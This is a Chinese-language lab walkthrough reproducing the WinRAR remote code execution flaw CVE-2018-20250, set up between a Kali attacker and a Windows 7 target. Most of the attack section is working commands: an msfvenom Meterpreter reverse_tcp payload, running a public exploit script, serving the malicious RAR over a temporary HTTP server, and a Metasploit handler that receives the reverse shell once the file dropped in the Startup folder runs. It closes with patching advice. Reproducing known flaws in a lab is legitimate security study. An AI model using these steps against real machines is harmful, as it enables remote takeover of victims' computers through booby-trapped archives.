winRAR远程代码执行漏洞复现(CVE-2018-20250)
1.漏洞影响
WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩< = 4.0.0.1170
2.环境搭建
攻击机:kali-2019 ip:192.168.0.171
靶机:windows 7 +winrar5.5 ip:192.168.0.169
3.漏洞复现
(1)下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250
(2)利用msfvenom生成恶意文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.171 lport=1234 -f exe >./test.exe
(3)编辑winrar漏洞exp文件
vi exp.py
按i进行编辑
修改python3的运行命令
修改完后按esc退出编辑,然后按:,输入wq保存
(4)运行winrar漏洞exp
python3 exp.py
(5)把恶意winrar文件传到靶机
为了方便,利用python开启临时server
python -m SimpleHTTPServer 999
利用靶机浏览器访问,并下载test.rar
(6)kali启动msf,设置监听
msfconsole
使用监听模块,并设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.171
set lport 1234
show options查看是否有遗漏
运行,exploit
(7)靶机解压恶意winrar文件
解压后会在自启动目录生成一个恶意文件hi.exe
目录为:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\(administrator改为你当前用户名)
当电脑重启后就会自动运行该文件(这里为了方便就直接双击了),查看进程hi.exe已经运行
(8)返回kali,已经建立会话sessions
4.漏洞修复
更新winrar到最新版本
使用其它的解压软件,如7z
漏洞分析链接:https://research.checkpoint.com/extracting-code-execution-from-winrar/
感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!